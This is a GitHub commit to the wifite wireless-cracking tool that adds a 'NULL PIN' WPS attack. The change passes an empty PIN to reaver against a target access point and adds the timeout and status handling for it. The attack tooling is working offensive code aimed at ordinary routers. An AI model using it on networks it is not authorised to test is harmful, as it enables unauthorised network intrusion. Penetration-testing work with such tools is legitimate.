Added WPS blank pin attack PR derv82#176

simonblack · Dec 14, 2018 · 2a664d4 · 2a664d4
1 parent 315232a
commit 2a664d4
Show file tree

Hide file tree

Showing 3 changed files with 22 additions and 6 deletions.
diff --git a/wifite/attack/all.py b/wifite/attack/all.py
@@ -64,6 +64,10 @@ def attack_single(cls, target, targets_remaining):
                     if Configuration.wps_pixie:
                         attacks.append(AttackWPS(target, pixie_dust=True))
 
+                    # Null PIN zero-day attack
+                    if Configuration.wps_pin:
+                        attacks.append(AttackWPS(target, pixie_dust=False, null_pin=True))
+
                     # PIN attack
                     if Configuration.wps_pin:
                         attacks.append(AttackWPS(target, pixie_dust=False))

diff --git a/wifite/attack/wps.py b/wifite/attack/wps.py
@@ -14,11 +14,12 @@ class AttackWPS(Attack):
     def can_attack_wps():
         return Reaver.exists() or Bully.exists()
 
-    def __init__(self, target, pixie_dust=False):
+    def __init__(self, target, pixie_dust=False, null_pin=False):
         super(AttackWPS, self).__init__(target)
         self.success = False
         self.crack_result = None
         self.pixie_dust = pixie_dust
+        self.null_pin = null_pin
 
     def run(self):
         ''' Run all WPS-related attacks '''
@@ -78,7 +79,7 @@ def run_bully(self):
 
 
     def run_reaver(self):
-        reaver = Reaver(self.target, pixie_dust=self.pixie_dust)
+        reaver = Reaver(self.target, pixie_dust=self.pixie_dust, null_pin=self.null_pin)
         reaver.run()
         self.crack_result = reaver.crack_result
         self.success = self.crack_result is not None

diff --git a/wifite/tools/reaver.py b/wifite/tools/reaver.py
@@ -18,10 +18,11 @@ class Reaver(Attack, Dependency):
     dependency_name = 'reaver'
     dependency_url = 'https://github.com/t6x/reaver-wps-fork-t6x'
 
-    def __init__(self, target, pixie_dust=True):
+    def __init__(self, target, pixie_dust=True, null_pin=False):
         super(Reaver, self).__init__(target)
 
         self.pixie_dust = pixie_dust
+        self.null_pin = null_pin
 
         self.progress = '0.00%'
         self.state = 'Initializing'
@@ -51,6 +52,9 @@ def __init__(self, target, pixie_dust=True):
         if pixie_dust:
             self.reaver_cmd.extend(['--pixie-dust', '1'])
 
+        if null_pin:
+            self.reaver_cmd.extend(['-p', ''])
+
         self.reaver_proc = None
 
     @staticmethod
@@ -117,7 +121,7 @@ def _run(self):
 
                 # Check if locked
                 if self.locked and not Configuration.wps_ignore_lock:
-                    raise Exception('{O}Access point is {R}Locked{W}')
+                    raise Exception('{O}Because access point is {R}Locked{W}')
 
                 time.sleep(0.5)
 
@@ -134,7 +138,7 @@ def _run(self):
 
 
     def get_status(self):
-        if self.pixie_dust:
+        if self.pixie_dust or self.null_pin:
             main_status = ''
         else:
             # Include percentage
@@ -206,6 +210,9 @@ def parse_failure(self, stdout):
         if self.pixie_dust and self.running_time() > Configuration.wps_pixie_timeout:
             raise Exception('Timeout after %d seconds' % Configuration.wps_pixie_timeout)
 
+        if self.null_pin and self.running_time() > Configuration.wps_pixie_timeout:
+            raise Exception('Timeout after %d seconds' % Configuration.wps_pixie_timeout)
+
         # WPSFail count
         self.total_wpsfails = stdout.count('WPS transaction failed')
         if self.total_wpsfails >= Configuration.wps_fail_threshold:
@@ -297,12 +304,16 @@ def pattack(self, message, newline=False):
             time_left = Configuration.wps_pixie_timeout - self.running_time()
             time_msg = '{O}%s{W}' % Timer.secs_to_str(time_left)
             attack_name = 'Pixie-Dust'
+        elif self.null_pin:
+            time_left = Configuration.wps_pixie_timeout - self.running_time()
+            time_msg = '{O}%s{W}' % Timer.secs_to_str(time_left)
+            attack_name = 'NULL PIN'
         else:
             time_left = self.running_time()
             time_msg = '{C}%s{W}' % Timer.secs_to_str(time_left)
             attack_name = 'PIN Attack'
 
-        if self.total_attempts > 0 and not self.pixie_dust:
+        if self.total_attempts > 0 and not self.pixie_dust and not self.null_pin:
             time_msg += ' {D}PINs:{W}{C}%d{W}' % self.total_attempts
 
         Color.clear_entire_line()